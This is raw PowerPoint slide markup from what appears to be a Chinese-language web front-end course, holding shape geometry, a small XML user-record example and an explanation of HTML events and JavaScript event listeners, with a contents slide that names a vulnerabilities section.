                <a:gd name="connsiteX4-1543" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY4-1544" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-1545" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY0-1546" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-1547" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY1-1548" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-1549" fmla="*/ 532789 w 2066053"/>
                <a:gd name="connsiteY2-1550" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-1551" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY3-1552" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-1553" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY4-1554" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-1555" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY0-1556" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-1557" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY1-1558" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-1559" fmla="*/ 618121 w 2066053"/>
                <a:gd name="connsiteY2-1560" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-1561" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY3-1562" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-1563" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY4-1564" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-1565" fmla="*/ 4729 w 44692"/>
                <a:gd name="connsiteY0-1566" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-1567" fmla="*/ 2196 w 44692"/>
                <a:gd name="connsiteY1-1568" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-1569" fmla="*/ 6964 w 44692"/>
                <a:gd name="connsiteY2-1570" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-1571" fmla="*/ 5856 w 44692"/>
                <a:gd name="connsiteY3-1572" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-1573" fmla="*/ 16514 w 44692"/>
                <a:gd name="connsiteY4-1574" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-1575" fmla="*/ 15846 w 44692"/>
                <a:gd name="connsiteY5-1576" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-1577" fmla="*/ 29814 w 44692"/>
                <a:gd name="connsiteY6-1578" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-1579" fmla="*/ 28406 w 44692"/>
                <a:gd name="connsiteY7-1580" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-1581" fmla="*/ 34165 w 44692"/>
                <a:gd name="connsiteY8-1582" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-1583" fmla="*/ 39698 w 44692"/>
                <a:gd name="connsiteY9-1584" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-1585" fmla="*/ 43546 w 44692"/>
                <a:gd name="connsiteY10-1586" fmla="*/ 15563 h 76558"/>
                <a:gd name="connsiteX11-1587" fmla="*/ 42478 w 44692"/>
                <a:gd name="connsiteY11-1588" fmla="*/ 17189 h 76558"/>
                <a:gd name="connsiteX12-1589" fmla="*/ 38360 w 44692"/>
                <a:gd name="connsiteY12-1590" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-1591" fmla="*/ 38436 w 44692"/>
                <a:gd name="connsiteY13-1592" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-1593" fmla="*/ 29114 w 44692"/>
                <a:gd name="connsiteY14-1594" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-1595" fmla="*/ 29856 w 44692"/>
                <a:gd name="connsiteY15-1596" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-1597" fmla="*/ 22177 w 44692"/>
                <a:gd name="connsiteY16-1598" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-1599" fmla="*/ 22536 w 44692"/>
                <a:gd name="connsiteY17-1600" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-1601" fmla="*/ 12134 w 44692"/>
                <a:gd name="connsiteY18-1602" fmla="*/ 2252 h 76558"/>
                <a:gd name="connsiteX19-1603" fmla="*/ 13815 w 44692"/>
                <a:gd name="connsiteY19-1604" fmla="*/ 1151 h 76558"/>
                <a:gd name="connsiteX20-1605" fmla="*/ 4163 w 44692"/>
                <a:gd name="connsiteY20-1606" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-1607" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1608" fmla="*/ 14229 h 765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41" y="connsiteY5-42"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX6-43" y="connsiteY6-44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX7-45" y="connsiteY7-46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX8-47" y="connsiteY8-48"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX9-49" y="connsiteY9-50"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX10-51" y="connsiteY10-52"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX11-53" y="connsiteY11-54"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX12-55" y="connsiteY12-56"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX13-57" y="connsiteY13-58"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX14-59" y="connsiteY14-60"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX15-61" y="connsiteY15-62"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX16-63" y="connsiteY16-64"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX17-65" y="connsiteY17-66"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX18-67" y="connsiteY18-68"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX19-69" y="connsiteY19-70"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX20-71" y="connsiteY20-72"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX21-73" y="connsiteY21-74"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="44692" h="76558">
                  <a:moveTo>
                    <a:pt x="3936" y="14229"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3665" y="11516"/>
                    <a:pt x="3817" y="5203"/>
                    <a:pt x="5469" y="3267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7122" y="1331"/>
                    <a:pt x="11110" y="427"/>
                    <a:pt x="13851" y="2612"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15524" y="-1681"/>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5214" y="22181"/>
                    <a:pt x="44574" y="25280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43934" y="28379"/>
                    <a:pt x="40735" y="33382"/>
                    <a:pt x="38011" y="33912"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37998" y="36179"/>
                    <a:pt x="37001" y="37250"/>
                    <a:pt x="35431" y="37710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33861" y="38170"/>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066053" h="1923764">
                  <a:moveTo>
                    <a:pt x="528711" y="1893610"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="528711" y="1910264"/>
                    <a:pt x="515211" y="1923764"/>
                    <a:pt x="498557" y="1923764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481903" y="1923764"/>
                    <a:pt x="468403" y="1910264"/>
                    <a:pt x="468403" y="1893610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="468403" y="1876956"/>
                    <a:pt x="481903" y="1863456"/>
                    <a:pt x="498557" y="1863456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="515211" y="1863456"/>
                    <a:pt x="528711" y="1876956"/>
                    <a:pt x="528711" y="1893610"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
                <a:path w="2066053" h="1923764">
                  <a:moveTo>
                    <a:pt x="653405" y="1638364"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="653405" y="1671671"/>
                    <a:pt x="626404" y="1698672"/>
                    <a:pt x="593097" y="1698672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="559790" y="1698672"/>
                    <a:pt x="532789" y="1671671"/>
                    <a:pt x="532789" y="1638364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="532789" y="1605057"/>
                    <a:pt x="559790" y="1578056"/>
                    <a:pt x="593097" y="1578056"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626404" y="1578056"/>
                    <a:pt x="653405" y="1605057"/>
                    <a:pt x="653405" y="1638364"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
                <a:path w="2066053" h="1923764">
                  <a:moveTo>
                    <a:pt x="799045" y="1326565"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="799045" y="1376526"/>
                    <a:pt x="758544" y="1417027"/>
                    <a:pt x="708583" y="1417027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="658622" y="1417027"/>
                    <a:pt x="618121" y="1376526"/>
                    <a:pt x="618121" y="1326565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="618121" y="1276604"/>
                    <a:pt x="658622" y="1236103"/>
                    <a:pt x="708583" y="1236103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758544" y="1236103"/>
                    <a:pt x="799045" y="1276604"/>
                    <a:pt x="799045" y="1326565"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
                <a:path w="44692" h="76558"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9814" y="39159"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29775" y="39806"/>
                    <a:pt x="28544" y="40096"/>
                    <a:pt x="28406" y="40718"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="34165" y="22813"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36169" y="24141"/>
                    <a:pt x="39716" y="30416"/>
                    <a:pt x="39698" y="33448"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="43546" y="15563"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43221" y="16595"/>
                    <a:pt x="43106" y="16461"/>
                    <a:pt x="42478" y="171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2134" y="2252"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12606" y="2628"/>
                    <a:pt x="13423" y="632"/>
                    <a:pt x="13815" y="1151"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="4163" y="15648"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4060" y="15184"/>
                    <a:pt x="3984" y="14710"/>
                    <a:pt x="3936" y="14229"/>
                  </a:cubicBezTo>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矩形: 圆角 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8102111" y="3602152"/>
              <a:ext cx="1799340" cy="795187"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9511"/>
              </a:avLst>
            </a:prstGeom>
            <a:no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zh-CN" sz="1100" b="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;user&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &lt;name&gt;Tom&lt;/name&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &lt;age&gt;20&lt;/age&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &lt;gender&gt;male&lt;/gender&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/user&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10047605" y="5084445"/>
            <a:ext cx="680085" cy="873760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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71500" y="1560499"/>
            <a:ext cx="10735309" cy="2764367"/>
            <a:chOff x="920210" y="1823315"/>
            <a:chExt cx="10200297" cy="2764367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="矩形: 对角圆角 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="920210" y="1823316"/>
              <a:ext cx="10200297" cy="2764366"/>
            </a:xfrm>
            <a:prstGeom prst="round2DiagRect">
              <a:avLst>
                <a:gd name="adj1" fmla="val 4120"/>
                <a:gd name="adj2" fmla="val 2820"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6350">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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76000" bIns="144000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Alibaba PuHuiTi R"/>
                <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="矩形: 对角圆角 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="920210" y="1823315"/>
              <a:ext cx="2015805" cy="431800"/>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事件监听</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Shape 2375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="765929" y="1631969"/>
            <a:ext cx="226187" cy="28886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bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>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solidFill>
                <a:srgbClr val="F4B246"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608009" y="1776399"/>
            <a:ext cx="10698800" cy="265765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200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>事件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>事件是发生在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>元素上的 “事情”。比如：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="575945" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="20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按钮被点击</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575945" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="20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鼠标移动到元素上</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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575945" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>按下键盘按键</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>事件监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>事件绑定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>可以在事件被侦测到时 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="398264"/>
            <a:ext cx="6097904" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>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目录</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序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270351" y="25839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01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270351" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直接连接符 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3007720" y="282595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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4817290" y="282595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序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889491" y="25839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03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889491" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
